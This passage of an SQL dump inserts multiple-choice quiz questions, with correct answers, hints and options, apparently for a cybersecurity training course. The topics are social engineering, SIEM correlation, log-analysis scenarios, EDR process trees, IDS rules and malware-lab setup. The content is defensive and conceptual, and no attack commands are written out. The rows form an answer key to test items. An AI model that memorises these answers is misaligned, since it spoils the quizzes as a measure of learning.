(5857, 205, 'What is the primary defense against Dumpster Diving?', 3, 'Shredding sensitive documents', 0, 'Shred', '2025-12-26 22:28:54', '[\"Burning trash\", \"Shredding sensitive documents\", \"Recycling\", \"Hiding trash\"]'),
(5858, 206, 'What is a \"USB Drop\" attack?', 1, 'Leaving an infected USB drive for a victim to find', 0, 'Bait', '2025-12-26 22:28:54', '[\"Throwing USBs at people\", \"Leaving an infected USB drive for a victim to find\", \"Stealing USBs\", \"Buying USBs\"]'),
(5859, 206, 'What human emotion does Baiting primarily exploit?', 2, 'Curiosity', 0, 'Wonder', '2025-12-26 22:28:54', '[\"Fear\", \"Curiosity\", \"Greed\", \"Sadness\"]'),
(5860, 206, 'How does Quid Pro Quo differ from Baiting?', 3, 'It involves an exchange of service/help', 0, 'Exchange', '2025-12-26 22:28:54', '[\"It is faster\", \"It involves an exchange of service/help\", \"It is digital only\", \"It uses email\"]'),
(5861, 207, 'Which Cialdini principle explains why people comply with requests from \"The CEO\"?', 1, 'Authority', 0, 'Boss', '2025-12-26 22:28:54', '[\"Liking\", \"Authority\", \"Scarcity\", \"Reciprocity\"]'),
(5862, 207, 'If an attacker does you a favor to make you feel obligated, which principle is this?', 2, 'Reciprocity', 0, 'Owe me', '2025-12-26 22:28:54', '[\"Social Proof\", \"Reciprocity\", \"Authority\", \"Commitment\"]'),
(5863, 207, '\"Only 2 spots left!\" is an example of:', 3, 'Scarcity', 0, 'Rare', '2025-12-26 22:28:54', '[\"Authority\", \"Scarcity\", \"Consistency\", \"Liking\"]'),
(5864, 207, 'What is the best way to verify a \"Bank\" calling you?', 4, 'Hang up and call the number on your card', 0, 'Source of truth', '2025-12-26 22:28:54', '[\"Ask for their ID\", \"Hang up and call the number on your card\", \"Trust Caller ID\", \"Ask for a supervisor\"]'),
(5865, 207, 'What is \"Pretexting\"?', 5, 'Creating a fabricated scenario to obtain info', 0, 'Lying scenario', '2025-12-26 22:28:54', '[\"Using text messages\", \"Creating a fabricated scenario to obtain info\", \"Pre-authorized scanning\", \"Testing backups\"]'),
(5866, 207, 'Which technology has made Vishing much more dangerous recently?', 6, 'AI Voice Cloning / Deepfakes', 0, 'AI', '2025-12-26 22:28:54', '[\"5G\", \"AI Voice Cloning / Deepfakes\", \"Fiber Optics\", \"VoIP\"]'),
(5867, 207, 'Why are shortened URLs (bit.ly) dangerous in SMS?', 7, 'They hide the true destination', 0, 'Obfuscation', '2025-12-26 22:28:54', '[\"They are slow\", \"They hide the true destination\", \"They cost money\", \"They assume HTTP\"]'),
(5868, 207, 'What is the term for Phishing via SMS?', 8, 'Smishing', 0, 'SMS', '2025-12-26 22:28:54', '[\"Vishing\", \"Smishing\", \"Phishing\", \"Texting\"]'),
(5869, 207, 'Where should you report spam texts?', 9, '7726 (SPAM)', 0, 'Carrier code', '2025-12-26 22:28:54', '[\"911\", \"7726 (SPAM)\", \"The Police\", \"Your Mom\"]'),
(5870, 207, 'What is \"Tailgating\"?', 10, 'Following an authorized person through a secure door', 0, 'Piggybacking', '2025-12-26 22:28:54', '[\"Driving close\", \"Following an authorized person through a secure door\", \"Hacking the lock\", \"Climbing the fence\"]'),
(5871, 207, 'What is the counter-measure for \"Dumpster Diving\"?', 11, 'Shredding documents', 0, 'Destruction', '2025-12-26 22:28:54', '[\"Recycling\", \"Shredding documents\", \"burning\", \"hiding\"]'),
(5872, 207, 'What is \"Shoulder Surfing\"?', 12, 'Looking at someone\'s screen/keyboard to steal info', 0, 'Peeking', '2025-12-26 22:28:54', '[\"Massaging shoulders\", \"Looking at someone\'s screen/keyboard to steal info\", \"Surfing the web\", \"Hacking wifi\"]'),
(5873, 207, 'If you find a USB drive labeled \"Payroll\" in the lobby, what should you do?', 13, 'Do not plug it in; give to Security', 0, 'Quarantine', '2025-12-26 22:28:54', '[\"Plug it in to check\", \"Do not plug it in; give to Security\", \"Throw it away\", \"Keep it\"]'),
(5874, 207, 'Establishing a fake \"Free WiFi\" spot to steal data is called:', 14, 'Evil Twin', 0, 'WiFi Clone', '2025-12-26 22:28:54', '[\"Bad Twin\", \"Evil Twin\", \"Good Twin\", \"Rogue AP\"]'),
(5875, 207, '\"Quid Pro Quo\" means:', 15, 'Something for Something', 0, 'Exchange', '2025-12-26 22:28:54', '[\"Free for all\", \"Something for Something\", \"Nothing for Nothing\", \"Quick Pro\"]'),
(5876, 207, 'What is the weakest link in most security systems?', 16, 'The Human', 0, 'People', '2025-12-26 22:28:54', '[\"The Firewall\", \"The Human\", \"The Encryption\", \"The Password\"]'),
(5877, 207, 'Does Social Engineering always involve a computer?', 17, 'No (Physical/Phone)', 0, 'No', '2025-12-26 22:28:54', '[\"Yes\", \"No (Physical/Phone)\", \"Maybe\", \"Only on Tuesdays\"]'),
(5878, 207, 'What implies \"Social Proof\"?', 18, '\"9 out of 10 users did this\"', 0, 'Crowd', '2025-12-26 22:28:54', '[\"\\\"I am the boss\\\"\", \"\\\"9 out of 10 users did this\\\"\", \"\\\"This is rare\\\"\", \"\\\"I like you\\\"\"]'),
(5879, 207, 'Why do attackers target new employees?', 19, 'They are eager to please and don\'t know procedures', 0, 'Newbies', '2025-12-26 22:28:54', '[\"They have more access\", \"They are eager to please and don\'t know procedures\", \"They make more money\", \"They are dumb\"]'),
(5880, 207, 'What is the best general defense against Social Engineering?', 20, 'Security Awareness Training & skepticism', 0, 'Training', '2025-12-26 22:28:54', '[\"Better Firewalls\", \"Security Awareness Training & skepticism\", \"More Antivirus\", \"Blocking Email\"]'),
(5881, 221, 'What is the primary function of \"Correlation\" in a SIEM?', 1, 'Connecting related events to detect threats', 0, 'Connecting dots', '2025-12-26 22:35:58', '[\"Saving storage space\", \"Connecting related events to detect threats\", \"Deleting old logs\", \"Speeding up the network\"]'),
(5882, 221, 'Why is \"Retention\" important?', 2, 'Compliance and Forensic Investigation', 0, 'History', '2025-12-26 22:35:58', '[\"To fill up hard drives\", \"Compliance and Forensic Investigation\", \"To slow down the system\", \"It is not important\"]'),
(5883, 221, 'What component typically sits on the Endpoint to send logs?', 3, 'Forwarder / Agent', 0, 'Sender', '2025-12-26 22:35:58', '[\"Firewall\", \"Forwarder / Agent\", \"Router\", \"Switch\"]'),
(5884, 222, 'Which protocol is the standard for network device logging?', 1, 'Syslog', 0, 'Standard', '2025-12-26 22:35:58', '[\"SMB\", \"Syslog\", \"FTP\", \"HTTP\"]'),
(5885, 222, 'What is \"NetFlow\" data?', 2, 'Traffic metadata (Who talked to Whom)', 0, 'Traffic info', '2025-12-26 22:35:58', '[\"Full packet capture\", \"Traffic metadata (Who talked to Whom)\", \"Email contents\", \"File contents\"]'),
(5886, 222, 'Why is \"Time Zone\" alignment critical in SIEM?', 3, 'To accurately correlate events across the world', 0, 'Timeline', '2025-12-26 22:35:58', '[\"It isn\'t\", \"To accurately correlate events across the world\", \"To know when to eat lunch\", \"For daylight savings\"]'),
(5887, 223, 'What is the goal of \"Normalization\"?', 1, 'Converting mixed formats into a standard field structure', 0, 'Standardization', '2025-12-26 22:35:58', '[\"Deleting logs\", \"Converting mixed formats into a standard field structure\", \"Encrypting logs\", \"Compressing logs\"]'),
(5888, 223, 'If Windows calls it \"AccountName\" and Linux calls it \"User\", what does the SIEM do?', 2, 'Maps them to a single field like user.name', 0, 'Mapping', '2025-12-26 22:35:58', '[\"Ignores them\", \"Maps them to a single field like user.name\", \"Deletes one\", \"Errors out\"]'),
(5889, 223, 'What process extracts \"192.168.1.1\" from a raw text message?', 3, 'Parsing', 0, 'Extraction', '2025-12-26 22:35:58', '[\"Hashing\", \"Parsing\", \"Encryption\", \"Routing\"]'),
(5890, 224, 'What defines a \"Brute Force\" correlation rule?', 1, 'Multiple failed logins in a short time', 0, 'Many fails', '2025-12-26 22:35:58', '[\"One failed login\", \"Multiple failed logins in a short time\", \"A successful login\", \"A slow login\"]'),
(5891, 224, 'What is \"Impossible Travel\"?', 2, 'Logins from two distant locations in an impossibly short time', 0, 'Teleportation', '2025-12-26 22:35:58', '[\"Traveling without a visa\", \"Logins from two distant locations in an impossibly short time\", \"VPN usage\", \"Remote work\"]'),
(5892, 224, 'Adjusting a rule to reduce False Positives is called:', 3, 'Tuning', 0, 'Adjustment', '2025-12-26 22:35:58', '[\"Breaking\", \"Tuning\", \"Deleting\", \"Ignoring\"]'),
(5893, 225, 'What query language does Splunk use?', 1, 'SPL (Search Processing Language)', 0, 'SPL', '2025-12-26 22:35:58', '[\"SQL\", \"SPL (Search Processing Language)\", \"KQL\", \"Python\"]'),
(5894, 225, 'What query language does Microsoft Sentinel use?', 2, 'KQL (Kusto Query Language)', 0, 'Kusto', '2025-12-26 22:35:58', '[\"SPL\", \"KQL (Kusto Query Language)\", \"Bash\", \"PowerShell\"]'),
(5895, 225, 'What is a major downside of Splunk traditionally?', 3, 'High cost', 0, 'Expensive', '2025-12-26 22:35:58', '[\"It is slow\", \"High cost\", \"It has no features\", \"It only runs on Mac\"]'),
(5896, 226, 'Which component of ELK provides the Visualization / Dashboard?', 1, 'Kibana', 0, 'UI', '2025-12-26 22:35:58', '[\"Elasticsearch\", \"Kibana\", \"Logstash\", \"Beats\"]'),
(5897, 226, 'What is the Database/Search Engine of the stack?', 2, 'Elasticsearch', 0, 'DB', '2025-12-26 22:35:58', '[\"MySQL\", \"Elasticsearch\", \"Redis\", \"Mongo\"]'),
(5898, 226, 'What are \"Beats\"?', 3, 'Lightweight data shippers/agents', 0, 'Agents', '2025-12-26 22:35:58', '[\"Music files\", \"Lightweight data shippers/agents\", \"Databases\", \"Firewalls\"]'),
(5899, 227, 'What makes Wazuh unique compared to basic ELK?', 1, 'It includes XDR features like FIM and Active Response', 0, 'XDR', '2025-12-26 22:35:58', '[\"It costs money\", \"It includes XDR features like FIM and Active Response\", \"It has no UI\", \"It creates viruses\"]'),
(5900, 227, 'What is \"Active Response\" in Wazuh?', 2, 'The ability to automatically block/stop a threat', 0, 'Action', '2025-12-26 22:35:58', '[\"Sending an email\", \"The ability to automatically block/stop a threat\", \"Deleting the server\", \"Calling the police\"]'),
(5901, 227, 'Is Wazuh open source?', 3, 'Yes', 0, 'Free', '2025-12-26 22:35:58', '[\"No\", \"Yes\", \"Only for students\", \"It is a subscription\"]'),
(5902, 228, 'What is the \"Normalization\" phase in SIEM?', 1, 'Mapping different log formats to standard fields', 0, 'Standardize', '2025-12-26 22:35:58', '[\"Compressing logs\", \"Mapping different log formats to standard fields\", \"Deleting logs\", \"Encrypting logs\"]'),
(5903, 228, 'Garbage In, Garbage Out refers to:', 2, 'A SIEM is only as good as the log data fed into it', 0, 'Input quality', '2025-12-26 22:35:58', '[\"Trash management\", \"A SIEM is only as good as the log data fed into it\", \"Deleting logs\", \"Hardware recycling\"]'),
(5904, 228, 'What is \"Impossible Travel\"?', 3, 'Logins from two locations physically impossible to traverse in the time', 0, 'Teleportation', '2025-12-26 22:35:58', '[\"VPN usage\", \"Logins from two locations physically impossible to traverse in the time\", \"Dual citizenship\", \"Space travel\"]'),
(5905, 228, 'SPL (Search Processing Language) belongs to which SIEM?', 4, 'Splunk', 0, 'The big one', '2025-12-26 22:35:58', '[\"Sentinel\", \"Splunk\", \"Wazuh\", \"ELK\"]'),
(5906, 228, 'KQL (Kusto Query Language) belongs to which SIEM?', 5, 'Microsoft Sentinel', 0, 'Azure', '2025-12-26 22:35:58', '[\"Splunk\", \"Microsoft Sentinel\", \"QRadar\", \"ArcSight\"]'),
(5907, 228, 'Which open-source tool allows for \"Active Response\" (blocking IPs)?', 6, 'Wazuh', 0, 'XDR', '2025-12-26 22:35:58', '[\"Logstash\", \"Wazuh\", \"Kibana\", \"Notepad\"]'),
(5908, 228, 'In the ELK stack, which tool is the \"UI\"?', 7, 'Kibana', 0, 'Visualizer', '2025-12-26 22:35:58', '[\"Elasticsearch\", \"Kibana\", \"Logstash\", \"Filebeat\"]'),
(5909, 228, 'What does a \"Forwarder\" do?', 8, 'Sends logs from the endpoint to the SIEM', 0, 'Transportation', '2025-12-26 22:35:58', '[\"Stores logs\", \"Sends logs from the endpoint to the SIEM\", \"Deletes logs\", \"Analyzes logs\"]'),
(5910, 228, 'Why do we need \"Retention\"?', 9, 'Compliance regulations often require keeping logs for 1 year+', 0, 'Compliance', '2025-12-26 22:35:58', '[\"To run out of space\", \"Compliance regulations often require keeping logs for 1 year+\", \"To slow down searches\", \"We don\'t\"]'),
(5911, 231, 'What is the Attacker\'s IP address?', 1, '192.168.1.55', 0, 'IP', '2025-12-26 22:41:26', '[\"127.0.0.1\", \"192.168.1.55\", \"10.0.0.1\", \"8.8.8.8\"]'),
(5912, 231, 'Did the attacker succeed?', 2, 'Yes, the last log says \"Accepted\"', 0, 'Success', '2025-12-26 22:41:26', '[\"No, all failed\", \"Yes, the last log says \\\"Accepted\\\"\", \"Maybe\", \"Unknown\"]'),
(5913, 231, 'Which account was targeted?', 3, 'root', 0, 'Admin', '2025-12-26 22:41:26', '[\"admin\", \"user\", \"root\", \"guest\"]'),
(5914, 232, 'What is the time interval between connections?', 1, '5 Minutes', 0, 'Regularity', '2025-12-26 22:41:26', '[\"1 Minute\", \"5 Minutes\", \"Random\", \"1 Hour\"]'),
(5915, 232, 'Why is \"Regularity\" suspicious?', 2, 'Machines are precise, humans are random', 0, 'Automation', '2025-12-26 22:41:26', '[\"It isn\'t\", \"Machines are precise, humans are random\", \"It means the network is fast\", \"It is normal\"]'),
(5916, 232, 'What destination IP is the victim talking to?', 3, '45.33.2.1', 0, 'C2', '2025-12-26 22:41:26', '[\"10.10.1.100\", \"127.0.0.1\", \"45.33.2.1\", \"192.168.1.1\"]'),
(5917, 233, 'What is the time difference between the two logins?', 1, '1 hour 15 minutes', 0, 'Delta', '2025-12-26 22:41:26', '[\"5 minutes\", \"1 hour 15 minutes\", \"8 hours\", \"1 day\"]'),
(5918, 233, 'Which user account is affected?', 2, 'alice@company.com', 0, 'User', '2025-12-26 22:41:26', '[\"bob\", \"admin\", \"alice@company.com\", \"root\"]'),
(5919, 233, 'What is the most likely malicious explanation?', 3, 'Credential Theft', 0, 'Stolen Creds', '2025-12-26 22:41:26', '[\"VPN\", \"Credential Theft\", \"Fast Plane\", \"Bug\"]'),
(5920, 234, 'Which group was the user added to?', 1, 'Domain Admins', 0, 'Admin', '2025-12-26 22:41:26', '[\"Users\", \"Guests\", \"Domain Admins\", \"Print Operators\"]'),
(5921, 234, 'What Windows Event ID indicates \"Member Added to Group\"?', 2, '4728', 0, 'ID', '2025-12-26 22:41:26', '[\"4624\", \"4728\", \"1102\", \"514\"]'),
(5922, 234, 'Why is the timestamp (03:00 AM) relevant?', 3, 'Off-hours changes are suspicious', 0, 'Night', '2025-12-26 22:41:26', '[\"It is daytime\", \"Off-hours changes are suspicious\", \"Servers restart then\", \"It is normal\"]'),
(5923, 235, 'What is hidden inside the long subdomains?', 1, 'Exfiltrated Data (Encoded)', 0, 'Stolen integrity', '2025-12-26 22:41:26', '[\"Nothing\", \"Exfiltrated Data (Encoded)\", \"IP addresses\", \"Viruses\"]'),
(5924, 235, 'Why do attackers use DNS for exfiltration?', 2, 'Firewalls usually allow Port 53 (DNS) outbound', 0, 'Port 53', '2025-12-26 22:41:26', '[\"It is faster\", \"Firewalls usually allow Port 53 (DNS) outbound\", \"It is encrypted\", \"It compresses data\"]'),
(5925, 235, 'What characteristic of the query string indicates tunneling?', 3, 'Length and High Entropy (Randomness)', 0, 'Long', '2025-12-26 22:41:26', '[\"Short length\", \"Length and High Entropy (Randomness)\", \"It is .com\", \"It is readable\"]'),
(5926, 236, 'In the Firewall log, what is the source IP doing?', 1, 'Port Scanning (trying different ports rapidly)', 0, 'SCAN', '2025-12-26 22:41:26', '[\"Downloading files\", \"Port Scanning (trying different ports rapidly)\", \"Updating\", \"Browsing web\"]'),
(5927, 236, 'What action did the firewall take?', 2, 'BLOCK', 0, 'Action', '2025-12-26 22:41:26', '[\"ALLOW\", \"BLOCK\", \"PASS\", \"LOG\"]'),
(5928, 236, 'What event ID represents a Successful Login?', 3, '4624', 0, 'ID', '2025-12-26 22:41:26', '[\"4625\", \"4624\", \"1000\", \"52\"]'),
(5929, 236, 'What time did the login occur?', 4, '02:00 AM', 0, 'Time', '2025-12-26 22:41:26', '[\"23:55\", \"02:00 AM\", \"Noon\", \"Midnight\"]'),
(5930, 236, 'In the Brute Force scenario, what indicates success?', 5, 'A \"Success\" or \"Accepted\" log after failures', 0, 'Win', '2025-12-26 22:41:26', '[\"More failures\", \"A \\\"Success\\\" or \\\"Accepted\\\" log after failures\", \"Nothing\", \"A lockout\"]'),
(5931, 236, 'How do you detect \"Beaconing\"?', 6, 'Regular time intervals (Heartbeat)', 0, 'Rhythm', '2025-12-26 22:41:26', '[\"High bandwidth\", \"Regular time intervals (Heartbeat)\", \"Random times\", \"Different IPs\"]'),
(5932, 241, 'What does EDR primarily monitor?', 1, 'Endpoint activities (Processes, Files, Network)', 0, 'Endpoint', '2025-12-26 22:47:08', '[\"Network traffic only\", \"Endpoint activities (Processes, Files, Network)\", \"Server hardware\", \"Cloud storage\"]'),
(5933, 241, 'What is a key \"Response\" capability of EDR?', 2, 'Isolating a machine from the network', 0, 'Containment', '2025-12-26 22:47:08', '[\"Sending email alerts\", \"Isolating a machine from the network\", \"Writing reports\", \"Installing updates\"]'),
(5934, 241, 'Where does the EDR Agent run?', 3, 'On each endpoint (laptop/server)', 0, 'Client side', '2025-12-26 22:47:08', '[\"In the cloud\", \"On the firewall\", \"On each endpoint (laptop/server)\", \"In a SIEM\"]'),
(5935, 242, 'What is the primary detection method for traditional Antivirus?', 1, 'Signatures (File Hashes)', 0, 'Hash', '2025-12-26 22:47:08', '[\"Behavior analysis\", \"Signatures (File Hashes)\", \"AI\", \"Network scanning\"]'),
(5936, 242, 'If malware uses a brand-new hash, what is this called?', 2, 'Zero-Day', 0, 'New', '2025-12-26 22:47:08', '[\"First-Day\", \"Zero-Day\", \"New Hash\", \"Fresh Malware\"]'),
(5937, 242, 'What does EDR provide that AV typically does not?', 3, 'Full context and telemetry (Process Tree, etc.)', 0, 'Visibility', '2025-12-26 22:47:08', '[\"A firewall\", \"Full context and telemetry (Process Tree, etc.)\", \"Email scanning\", \"Physical security\"]'),
(5938, 243, 'What does a Process Tree show?', 1, 'Which process started which other process', 0, 'Ancestry', '2025-12-26 22:47:08', '[\"Network connections\", \"Which process started which other process\", \"File locations\", \"User logins\"]'),
(5939, 243, 'In \"explorer.exe -> chrome.exe\", which is the Parent?', 2, 'explorer.exe', 0, 'Desktop', '2025-12-26 22:47:08', '[\"chrome.exe\", \"explorer.exe\", \"System\", \"Neither\"]'),
(5940, 243, 'Why is \"winword.exe -> cmd.exe -> powershell.exe\" suspicious?', 3, 'Office apps should not spawn shells', 0, 'Unexpected child', '2025-12-26 22:47:08', '[\"It is normal\", \"Office apps should not spawn shells\", \"PowerShell is fast\", \"CMD is old\"]'),
(5941, 244, 'Which parent legitimately spawns svchost.exe?', 1, 'services.exe', 0, 'Services Manager', '2025-12-26 22:47:08', '[\"explorer.exe\", \"word.exe\", \"services.exe\", \"chrome.exe\"]'),
(5942, 244, 'If Excel spawns wscript.exe, what is the likely cause?', 2, 'A malicious VBA Macro', 0, 'Macro', '2025-12-26 22:47:08', '[\"A print job\", \"A malicious VBA Macro\", \"An update\", \"Normal behavior\"]'),
(5943, 244, 'What does \"-EncodedCommand\" in PowerShell indicate?', 3, 'Base64-encoded script (often malicious)', 0, 'Obfuscation', '2025-12-26 22:47:08', '[\"Help text\", \"Fast mode\", \"Base64-encoded script (often malicious)\", \"Admin mode\"]'),
(5944, 245, 'In a phishing attack, which application typically spawns cmd.exe?', 1, 'The Office application (Word/Excel)', 0, 'Office', '2025-12-26 22:47:08', '[\"Explorer\", \"The Office application (Word/Excel)\", \"Chrome\", \"Notepad\"]'),
(5945, 245, 'What does \"Living off the Land\" mean?', 2, 'Using built-in tools (PowerShell, WMI) instead of malware', 0, 'No foreign tools', '2025-12-26 22:47:08', '[\"Farming\", \"Using built-in tools (PowerShell, WMI) instead of malware\", \"Using old malware\", \"Running slowly\"]'),
(5946, 245, 'Why is \"certutil\" used by attackers?', 3, 'It can download files (LOLBIN)', 0, 'Built-in downloader', '2025-12-26 22:47:08', '[\"It encrypts data\", \"It can download files (LOLBIN)\", \"It scans networks\", \"It deletes logs\"]'),
(5947, 246, 'Which EDR is famous for APT tracking (e.g., Fancy Bear)?', 1, 'CrowdStrike', 0, 'Falcon', '2025-12-26 22:47:08', '[\"SentinelOne\", \"CrowdStrike\", \"Carbon Black\", \"Elastic\"]'),
(5948, 246, 'Which EDR is native to Windows and uses KQL?', 2, 'Microsoft Defender for Endpoint', 0, 'MDE', '2025-12-26 22:47:08', '[\"CrowdStrike\", \"SentinelOne\", \"Microsoft Defender for Endpoint\", \"Carbon Black\"]'),
(5949, 246, 'Which EDR can autonomously \"rollback\" ransomware damage?', 3, 'SentinelOne', 0, 'Autonomous', '2025-12-26 22:47:08', '[\"CrowdStrike\", \"Carbon Black\", \"SentinelOne\", \"Elastic\"]'),
(5950, 247, 'What is the Grandparent of powershell.exe?', 1, 'WINWORD.EXE', 0, 'Word', '2025-12-26 22:47:08', '[\"explorer.exe\", \"outlook.exe\", \"WINWORD.EXE\", \"cmd.exe\"]'),
(5951, 247, 'What is the likely initial attack vector?', 2, 'A malicious email attachment (phishing)', 0, 'Phishing', '2025-12-26 22:47:08', '[\"USB drive\", \"A malicious email attachment (phishing)\", \"Direct network attack\", \"Insider\"]'),
(5952, 247, 'What do whoami, ipconfig, net user suggest?', 3, 'Reconnaissance / Discovery', 0, 'Recon', '2025-12-26 22:47:08', '[\"Cleanup\", \"Reconnaissance / Discovery\", \"Data destruction\", \"Patching\"]'),
(5953, 247, 'The \"-enc\" flag in PowerShell indicates:', 4, 'Base64-encoded command (obfuscation)', 0, 'Hidden command', '2025-12-26 22:47:08', '[\"Encryption\", \"Base64-encoded command (obfuscation)\", \"Error logging\", \"Network mode\"]'),
(5954, 247, 'What is the key difference between AV and EDR?', 5, 'EDR provides visibility and behavior analysis', 0, 'Telemetry', '2025-12-26 22:47:08', '[\"EDR is cheaper\", \"EDR provides visibility and behavior analysis\", \"AV is newer\", \"AV blocks more\"]'),
(5955, 247, 'Which process is the legitimate parent of svchost.exe?', 6, 'services.exe', 0, 'Service Controller', '2025-12-26 22:47:08', '[\"explorer.exe\", \"winlogon.exe\", \"services.exe\", \"cmd.exe\"]'),
(5956, 251, 'Where is a NIDS typically deployed?', 1, 'At network choke points (e.g., behind firewall)', 0, 'Network edge', '2025-12-26 22:50:58', '[\"On each laptop\", \"At network choke points (e.g., behind firewall)\", \"In the cloud only\", \"On the router console\"]'),
(5957, 251, 'What is a major weakness of NIDS?', 2, 'Blind to encrypted traffic (TLS)', 0, 'Encryption', '2025-12-26 22:50:58', '[\"It is slow\", \"Blind to encrypted traffic (TLS)\", \"It needs batteries\", \"It cannot see packets\"]'),
(5958, 251, 'Which tool is a common HIDS agent?', 3, 'OSSEC / Wazuh', 0, 'Host agent', '2025-12-26 22:50:58', '[\"Snort\", \"OSSEC / Wazuh\", \"Wireshark\", \"Nmap\"]'),
(5959, 252, 'What is the main weakness of Signature-Based detection?', 1, 'Cannot detect Zero-Day (unknown) attacks', 0, 'New threats', '2025-12-26 22:50:58', '[\"Too many alerts\", \"Cannot detect Zero-Day (unknown) attacks\", \"It is expensive\", \"It requires hardware\"]'),
(5960, 252, 'Anomaly-Based detection learns a _____ of normal behavior.', 2, 'Baseline', 0, 'Normal', '2025-12-26 22:50:58', '[\"Signature\", \"Baseline\", \"Firewall\", \"Password\"]'),
(5961, 252, 'Which method typically has more False Positives?', 3, 'Anomaly-Based', 0, 'Noisy', '2025-12-26 22:50:58', '[\"Signature-Based\", \"Anomaly-Based\", \"Neither\", \"Both equally\"]'),
(5962, 253, 'In a Snort rule, what does \"sid\" stand for?', 1, 'Signature ID', 0, 'Unique ID', '2025-12-26 22:50:58', '[\"Session ID\", \"Signature ID\", \"Source ID\", \"Snort ID\"]'),
(5963, 253, 'What action does \"alert\" perform in Snort?', 2, 'Logs and generates an alert', 0, 'Notify', '2025-12-26 22:50:58', '[\"Blocks traffic\", \"Logs and generates an alert\", \"Drops the packet\", \"Ignores it\"]'),
(5964, 253, 'What symbol defines direction in Snort rules?', 3, '-> (Arrow)', 0, 'Arrow', '2025-12-26 22:50:58', '[\"<-\", \"-> (Arrow)\", \"==\", \"=>\"]'),
(5965, 254, 'What is a major performance advantage of Suricata over Snort 2?', 1, 'Multi-threading (uses all CPU cores)', 0, 'Parallel', '2025-12-26 22:50:58', '[\"It is smaller\", \"Multi-threading (uses all CPU cores)\", \"It has a GUI\", \"It is older\"]'),
(5966, 254, 'Can Suricata use Snort rules?', 2, 'Yes', 0, 'Compatible', '2025-12-26 22:50:58', '[\"No\", \"Yes\", \"Only some\", \"Only paid\"]'),
(5967, 254, 'What does Suricata\'s \"File Extraction\" feature do?', 3, 'Saves suspicious files from network traffic', 0, 'Carving', '2025-12-26 22:50:58', '[\"Deletes files\", \"Saves suspicious files from network traffic\", \"Encrypts files\", \"Compresses files\"]'),
(5968, 255, 'What is the first step when triaging an IDS alert?', 1, 'Read the alert message to understand the claim', 0, 'Understand', '2025-12-26 22:50:58', '[\"Delete it\", \"Read the alert message to understand the claim\", \"Block the IP\", \"Reboot the server\"]'),
(5969, 255, 'What often causes False Positives from internal security scanners?', 2, 'Scanners like Nessus trigger \"Port Scan\" rules', 0, 'Your own tools', '2025-12-26 22:50:58', '[\"Hackers\", \"Scanners like Nessus trigger \\\"Port Scan\\\" rules\", \"Viruses\", \"Weather\"]'),
(5970, 255, 'What is \"Tuning\" an IDS rule?', 3, 'Adjusting it to reduce false positives', 0, 'Improve accuracy', '2025-12-26 22:50:58', '[\"Deleting the rule\", \"Adjusting it to reduce false positives\", \"Making it louder\", \"Breaking it\"]'),
(5971, 256, 'Which IDS type monitors network traffic at a choke point?', 1, 'NIDS', 0, 'Network', '2025-12-26 22:50:58', '[\"HIDS\", \"NIDS\", \"SIDS\", \"AIDS\"]'),
(5972, 256, 'Which IDS type can see inside encrypted sessions on the host?', 2, 'HIDS', 0, 'Host', '2025-12-26 22:50:58', '[\"NIDS\", \"HIDS\", \"Firewall\", \"VPN\"]'),
(5973, 256, 'Signature-Based detection relies on:', 3, 'A database of known attack patterns', 0, 'Signatures', '2025-12-26 22:50:58', '[\"Learning normal behavior\", \"A database of known attack patterns\", \"User reports\", \"Random chance\"]'),
(5974, 256, 'Anomaly-Based detection can find:', 4, 'Zero-Day attacks', 0, 'Novel threats', '2025-12-26 22:50:58', '[\"Only known attacks\", \"Zero-Day attacks\", \"Nothing\", \"Old malware\"]'),
(5975, 256, 'Which tool is native multi-threaded?', 5, 'Suricata', 0, 'Performance', '2025-12-26 22:50:58', '[\"Snort 2\", \"Suricata\", \"Wireshark\", \"Nmap\"]'),
(5976, 256, 'In Snort, what does \"msg\" specify?', 6, 'The alert message text', 0, 'Description', '2025-12-26 22:50:58', '[\"Source IP\", \"The alert message text\", \"Destination port\", \"Protocol\"]'),
(5977, 261, 'Which malware type encrypts your files and demands payment?', 1, 'Ransomware', 0, 'Ransom', '2025-12-26 22:55:56', '[\"Spyware\", \"Ransomware\", \"Worm\", \"Virus\"]'),
(5978, 261, 'What makes a Worm different from a Virus?', 2, 'Worms spread without user interaction', 0, 'Self-replicating', '2025-12-26 22:55:56', '[\"Worms are bigger\", \"Worms spread without user interaction\", \"Viruses are newer\", \"No difference\"]'),
(5979, 261, 'What is \"Fileless Malware\"?', 3, 'Malware that lives in RAM, not on disk', 0, 'Memory-only', '2025-12-26 22:55:56', '[\"Malware with no code\", \"Malware that lives in RAM, not on disk\", \"Malware that is deleted\", \"Malware on USB\"]'),
(5980, 262, 'What is Static Analysis?', 1, 'Examining malware without executing it', 0, 'Not running', '2025-12-26 22:55:56', '[\"Running malware in a sandbox\", \"Examining malware without executing it\", \"Asking the malware questions\", \"Deleting the malware\"]'),
(5981, 262, 'What is a major risk of Dynamic Analysis?', 2, 'Sandbox escape', 0, 'Containment failure', '2025-12-26 22:55:56', '[\"It is too slow\", \"Sandbox escape\", \"It is too expensive\", \"Nothing\"]'),
(5982, 262, 'What tool is commonly used for strings extraction?', 3, 'strings command', 0, 'Text', '2025-12-26 22:55:56', '[\"Wireshark\", \"strings command\", \"Nmap\", \"Burp Suite\"]'),
(5983, 263, 'Why should you use \"Host-Only\" networking for a malware lab?', 1, 'To prevent the malware from reaching the internet', 0, 'Isolation', '2025-12-26 22:55:56', '[\"It is faster\", \"To prevent the malware from reaching the internet\", \"It is default\", \"For gaming\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(5984, 263, 'What is FlareVM?', 2, 'A pre-configured Windows VM for malware analysis', 0, 'Mandiant tool', '2025-12-26 22:55:56', '[\"A virus\", \"A pre-configured Windows VM for malware analysis\", \"A firewall\", \"An antivirus\"]'),
(5985, 263, 'What should you do BEFORE running malware in a VM?', 3, 'Take a snapshot', 0, 'Snapshot', '2025-12-26 22:55:56', '[\"Delete all files\", \"Take a snapshot\", \"Turn off the firewall\", \"Install games\"]'),
(5986, 264, 'What does high entropy (>7.0) in a file suggest?', 1, 'The file is packed or encrypted', 0, 'Obfuscation', '2025-12-26 22:55:56', '[\"It is small\", \"The file is packed or encrypted\", \"It is safe\", \"It is old\"]'),
(5987, 264, 'If a PE file imports \"VirtualAlloc\", what might it be doing?', 2, 'Memory allocation for code injection', 0, 'Injection', '2025-12-26 22:55:56', '[\"Playing music\", \"Memory allocation for code injection\", \"Deleting files\", \"Printing documents\"]'),
